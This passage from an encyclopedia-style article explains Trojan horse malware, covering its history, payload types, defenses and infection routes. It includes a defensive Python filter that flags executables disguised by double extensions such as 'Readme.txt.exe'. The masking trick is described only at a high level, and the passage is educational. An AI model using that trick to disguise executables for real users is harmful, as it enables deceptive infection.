Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like viruses or worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims. As such, if trojans replicate and even distribute themselves, each new victim must run the program/trojan. Therefore their virulence is of a different nature, depending on successful implementation of social engineering concepts rather than flaws in a computer system's security design or configuration.

Definition


A Trojan horse program has a useful and desired function, or at least it has the appearance of having such. Trojans use false and fake names to trick users into dismissing the processes. These strategies are often collectively termed social engineering. In most cases the program performs other, undesired functions, but not always. The useful, or seemingly useful, functions serve as camouflage for these undesired functions. A trojan is designed to operate with functions unknown to the victim. The kind of undesired functions are not part of the definition of a Trojan Horse; they can be of any kind, but typically they have malicious intent.


In practice, Trojan Horses in the wild often contain spying functions (such as a packet sniffer) or backdoor functions that allow a computer, unknown to the owner, to be remotely controlled from the network, creating a "zombie computer". The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things. Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.

In the context of computer security, the term 'Trojan horse' was first used in a seminal report edited/written by JP Anderson (aka 'The Anderson Report'; Computer Security Technology Planning, Technical Report ESD-TR-73-51, USAF Electronic Systems Division, Hanscom AFB, Oct 1972), which credits Daniel J Edwards, then of NSA, for both the coinage and the concept. One of the earliest known Trojans was a binary Trojan distributed in the binary Multics distribution; it was described by PA Karger and RR Schell in 1974 (Multics Security Evaluation, Technical Report ESD-TR-74-193 vol II, HQ Electronic Systems Division, Hanscom AFB, June 1974).

The basic difference from computer viruses is that a Trojan horse is technically a normal computer program and does not possess the means to spread itself. The earliest known Trojan horses were not designed to spread themselves. They relied on fooling people to allow the program to perform actions that they would otherwise not have voluntarily performed.

Trojans implementing backdoors typically set up a hidden server, to which a hacker with a client can then log on. They have become polymorphic, process-injecting, prevention-disabling and easy to use without authorization, and are therefore abusive.

Trojans of recent times also come as computer worm payloads. It is important to note that the defining characteristics of Trojans are that they require some user interaction, and cannot function entirely on their own nor do they self-propagate/replicate.

Examples

Example of a simple Trojan horse

A simple example of a trojan horse would be a program named "waterfalls.scr.exe" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the computer.

Example of a somewhat advanced Trojan horse

On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse's extension might be "masked" by giving the file a name such as 'Readme.txt.exe'. With file extensions hidden, the user would only see 'Readme.txt' and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different and benign program or file type.

When the recipient double-clicks on the attachment, the Trojan horse might superficially do what the user expects it to do (open a text file, for example), so as to keep the victim unaware of its real, concealed objectives. Meanwhile, it might discreetly modify or delete files, change the configuration of the computer, or even use the computer as a base from which to attack local or other networks, possibly joining many other similarly infected computers as part of a distributed denial-of-service attack. The Sony/BMG rootkit mentioned above not only installed a vulnerability on victim computers, but also acted as spyware, reporting back to a central server from time to time whenever any of the music CDs carrying it were played on a Windows computer system.
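A mail gateway or desktop filter can catch the 'Readme.txt.exe' trick described above before a user sees the masked name. The following is an added example (not from the original page): it reproduces what a user sees with extensions hidden and flags attachments whose real, final extension is one of the executable types the text names while the preceding one looks like a document. The executable list comes from the text; the decoy-extension list is an assumption.

```python
EXECUTABLE_EXT = {"exe", "com", "scr", "bat", "pif"}             # named in the text
DECOY_EXT = {"txt", "doc", "pdf", "jpg", "jpeg", "gif", "png"}   # assumed decoys


def displayed_name(filename, hide_known_extensions=True):
    """Approximate what Explorer shows with 'Hide extensions for known file
    types' enabled: the final extension is dropped, everything before it stays."""
    if hide_known_extensions and "." in filename.strip("."):
        return filename.rsplit(".", 1)[0]
    return filename


def check_attachment(filename):
    """Return (suspicious, reason) for one attachment name.

    The decision uses the real (last) extension, never the displayed name,
    which is exactly the part the masking trick hides from the user.
    """
    parts = filename.lower().strip().split(".")
    if len(parts) < 2:
        return False, "no extension"
    real = parts[-1]
    if real not in EXECUTABLE_EXT:
        return False, "not an executable extension"
    shown = displayed_name(filename)
    if len(parts) >= 3 and parts[-2] in DECOY_EXT:
        return True, f"executable '.{real}' masked as '.{parts[-2]}'; shown as '{shown}'"
    return True, f"executable attachment ('.{real}')"


if __name__ == "__main__":
    # Constructed attachment names, including the two the text uses.
    for name in ("Readme.txt.exe", "waterfalls.scr.exe", "notes.txt", "invoice.pdf.scr"):
        print(f"{name:20s} -> {check_attachment(name)}")
```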



Types of Trojan horses

Trojan horses are almost always designed to do various harmful things, but could be harmless. Examples are:

- erasing or overwriting data on a computer.

- encrypting files in a cryptoviral extortion attack.

- corrupting files in a subtle way.

- uploading and downloading files.

- allowing remote access to the victim's computer. This is called a RAT (remote administration tool).

- spreading other malware, such as viruses. In this case the Trojan horse is called a 'dropper' or 'vector'.

- setting up networks of zombie computers in order to launch DDoS attacks or send spam.

- spying on the user of a computer and covertly reporting data such as browsing habits to other people (see the article on spyware).

- taking screenshots.

- logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger).

- phishing for bank or other account details, which can be used for criminal activities.

- installing a backdoor on a computer system.

- opening and closing the CD-ROM tray.

Time bombs and logic bombs

"Time bombs" and "logic bombs" are types of trojan horses.

"Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer.


Precautions against Trojan horses

Trojan horses can be protected against through end-user awareness. Trojan horse viruses can cause a great deal of damage to a personal computer, but even more damaging is what they can do to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan horse virus is hidden, it is harder to protect yourself or your company from them, but there are things that you can do.

Trojan horses are most commonly spread through e-mail, much like other types of common viruses. The only difference, of course, is that a Trojan horse is hidden. The best ways to protect yourself and your company from Trojan horses are as follows:

1. If you receive e-mail from someone that you do not know, or you receive an unknown attachment, never open it right away. As an e-mail user you should confirm the source. Some hackers have the ability to steal address books, so seeing e-mail from someone you know does not necessarily make it safe.

2. When setting up your e-mail client, make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this, it would be best to purchase one or download one for free.

3. Make sure your computer has an anti-virus program on it and make sure you update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on; that way, if you forget to update your software, you can still be protected from threats.

4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan horses. Software developers like Microsoft offer patches that in a sense "close the hole" that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches, your computer is kept much safer.

5. Avoid using peer-to-peer (P2P) sharing networks like Kazaa, Limewire, Ares, or Gnutella, because those programs are generally unprotected from viruses and Trojan horse viruses are especially easy to spread through them. Some of these programs do offer some virus protection, but often it is not strong enough.

Besides these sensible precautions, one can also install anti-trojan software, some of which are offered free.




Methods of Infection


The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.

Websites: You can be infected by visiting a rogue website. Internet Explorer is most often targeted by makers of trojans and other pests, because it contains numerous bugs, some of which improperly handle data (such as HTML or images) by executing it as a legitimate program. (Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.) The more "features" a web browser has (for example ActiveX objects, and some older versions of Flash or Java), the higher your risk of having security holes that can be exploited by a trojan horse.

Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. The same vulnerabilities exist since Outlook allows email to contain HTML and images (and actually uses much of the same code to process these as Internet Explorer). Furthermore, an infected file can be included as an attachment. In some cases, an infected email will infect your system the moment it is opened in Outlook -- you don't even have to run the infected attachment.

For this reason, using Outlook lowers your security substantially.

Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide filesharing capabilities such as Instant Messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those d